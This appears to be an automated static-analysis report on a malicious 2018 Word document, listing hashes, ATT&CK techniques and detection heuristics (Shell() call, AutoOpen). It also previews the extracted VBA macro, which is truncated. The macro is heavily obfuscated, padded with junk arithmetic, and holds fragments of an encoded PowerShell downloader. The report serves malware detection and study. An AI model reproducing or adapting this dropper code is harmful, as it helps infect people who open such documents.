Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 579b0c664e976b37…

MALICIOUS

Office (OLE)

125.0 KB Created: 2018-02-15 20:37:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: eaf5fafaee356a00aa097f538c62920a SHA-1: f80f442aa91021504ea4f8d8669db3127818a7eb SHA-256: 579b0c664e976b378be77d3edc27a78a35b55404adee16fcb9b664ad681eac2c
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The macro utilizes the Shell() function, a critical heuristic firing, to execute commands. This suggests the macro's purpose is to download and execute a second-stage payload. The presence of AutoOpen and legacy WordBasic markers further indicates malicious intent.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6451759-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6451759-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 25872 bytes
SHA-256: 672dc604e249edf904695d56de1862af99985bd82e0b5f282c5e4c2c8f2245ae
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "fdFEUjnm"
Function QdBJjwjTLRDtE()
On Error Resume Next
AjazTSvRw = 3389560 / CLng(pwGZuA) - 6788219 * Cos(9994853) + tPPAljowri + 3530404
UswtICCww = 3512096 / CLng(KXDQfjwM) - 5367266 * Cos(5287361) + drHtWLdQfvbh + 3239743
iFCnHXPWc = 9925619 / CLng(zQYwAzqWoiWdUz) - 664788 * Cos(3418662) + ndWtbvZj + 209459
njYCwpX = (ZVwjzhjFUoi) + HJjkJKD("T+']110+[char]116),[char]39  '+'-ReplACE  ([cha'+'r]56+[char]50+[char]103zcX+zcX),[chzcX+zcXar]'+'96-ReplACE  scoM3ysco,[char]36) 6SA.( ([sTriNg]c9sver'+'boSepREfE'+'rENCzcJVGTbqwwpRzkjNljFqPfHmtZtYIjzIIb", 2, 171)
CUwGqGim = 3779937 / CLng(AhIQbdK) - 8762120 * Cos(7607187) + BWVwQzzDzF + 8546375
RrWzFdm = 6899101 / CLng(kNXdmMq) - 6874315 * Cos(4672771) + kZwslL + 9074784
csZUuNpcn = 4639471 / CLng(wniQJqOcpjXNSQ) - 4000416 * Cos(4672310) + DAYhz + 8707164
tMuPUFXjV = (kmfofbmmV) + HJjkJKD("dqlhmFtnt+Antrg/xIAzcX+zcXnt+AnteDFfP/FK'+'T'+'Ant'+'+Ant.SplAnt+Antit(Ant'+'+AntFAnt+AntKT'+'?FKTAnt+Ant)Ant+Ant;CGJSD'+'zcX+zcXCAsco+scont+An'+'t = CAnt+ATNdzmjZBQ", 8, 149)
NXOul = 1739969 / CLng(UiHvzPBuEB) - 4687467 * Cos(3306453) + VcqVjWfvVFpNAw + 9184504
wFZTsqicHTP = 8571043 / CLng(USPpmikHhf) - 6772673 * Cos(5998350) + wpVbOYKiNwdiwc + 3496595
bRDMVFLtVw = 6506665 / CLng(SGBbjFBHiwGOwq) - 9250578 * Cos(3093342) + JzrZiXiwH + 4356776
usGiLuM = (ZCzOmXkBAAtS) + HJjkJKD("TvCTqlsYtqHbvPbBs .( $eNv:COmsPEC[4,24,25]-jOIn'') (('& ( V'+'iISH'+'ELLiD[1]+ViIsHEllId[13]+zcXx'+'zcX) ( ((zcX ((sco& ( M3yEnv:CoMs'+'peC[4,24,25]-JOinAntAzcX+zcXnt)((AntzcuJiw", 18, 157)
DNdVDY = 3678266 / CLng(qZkiTcZi) - 2877274 * Cos(7649) + wnoPdSmBuPXFC + 9580746
WjQZbijL = 5882204 / CLng(sREpOizjJcu) - 1964970 * Cos(8846378) + BFTlcQbzbOfYY + 601791
noLDaXvAJ = 3707414 / CLng(ikouhRKK) - 6021875 * Cos(2754887) + FGBYcHEORlQV + 2730666
ijqtn = (TfZDQPFhRZ) + HJjkJKD("sdnzrU-obAn'+'t+AntszcX+zcXc'+'o+scojecFKT+FAnt+AntKTtAnt+AntFKT) zcX+zcXrAnt+AntandAnt+AFiQIjQRvbYiOMLCpUKDdKdF", 7, 83)
UiJsFLkzUBw = 8676683 / CLng(qCQUoBhRP) - 5081186 * Cos(7723527) + bUAoEqpQHOGI + 9218530
iVVczwatXu = 5888769 / CLng(cKGlkzQzH) - 4903922 * Cos(7924645) + OIcuvL + 3879529
iWHpdstcUs = 1483375 / CLng(IRJljcSbvI) - 4718150 * Cos(1986707) + EHIoEoLUtPP + 6734589
XPuZWKhMC = (PqtJVzIjvJGOcW) + HJjkJKD("dfEZITCqkHREGiHZDrQzhfcUp'+'X+zcXe)[1,3]+scoxsco-jOiNuKVtKoYNjknB", 26, 28)
fTqWcrN = 1391543 / CLng(vGOCuCFVmHk) - 2344008 * Cos(9379141) + jjOMpARNwiww + 7213210
AuoXPZwitj = 8601617 / CLng(KjFpw) - 5193668 * Cos(7957515) + qCwwBL + 3251824
rfvfnfbvB = 5137069 / CLng(TKwUG) - 4831093 * Cos(3242929) + NiJfDv + 3334866
HHbZbwQ = (zDWzYLQQziDUlG) + HJjkJKD("Qr+'}catcAnt+Anth{}}AnqiriEXWTN", 3, 20)
jzBvFEV = 827817 / CLng(oiitfb) - 7557182 * Cos(1368520) + lkitvhTzEqh + 3034218
sjjQUu = 4664369 / CLng(zfdXI) - 3207699 * Cos(8061728) + hYNqnSTO + 302782
nmQWIVwR = 7095566 / CLng(NRfTm) - 2375111 * Cos(2432342) + dpsWuQf + 6976469
CYOja = (dYJsCPCfIuibuj) + HJjkJKD("NzIX+zdVhYaImEwBTXij", 4, 3)
PUQziqABCG = 2605857 / CLng(mSLrKwF) - 2341031 * Cos(5511033) + BSZIiFMzGLXw + 5471983
uTGKzLbaXP = 1745397 / CLng(GSKzAD) - 4869109 * Cos(6338539) + sRCLti + 7180318
uLrja = 5636996 / CLng(OJMflSYdsqBno) - 8068493 * Cos(441568) + DduMckclUQQ + 639986
jdncjzb = (fFtAippz) + HJjkJKD("kflwnEBVmLzaCwUUacX+zcXar]65+KJiLiTbadhbrwD", 18, 12)
WTOEaMAcak = 6000228 / CLng(EbAapEqQ) - 2703521 * Cos(5753949) + aKVCVboSbsj + 5421469
JVVdUmHF = 459687 / CLng(cwClEZtGCLoDa) - 2566531 * Cos(3835204) + dtjTSQMpFvW + 3225571
HncjKKI = 749146 / CLng(XzzkNIoiJ) - 867909 * Cos(7561031) + IJORBbwr + 2915127
wrhwWUs = (ztbhraXLi) + HJjkJKD("GvNirsiQRfTzriUuWzantzcX+zcX+Antfc'+'sco+sco.Ant+Ant2Ant+AntzcX+zcXTiAnt+AntTAnt+z'+'cX+zcXAntoSAnt+Anttre7Ant+A'+'ntjie7jzcX+zcXNgAnt'+'+Ant2Ti(zcX+zcX)Ant+Ant,sc'+'RjnQFJ", 20, 147)
zZEAW =
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.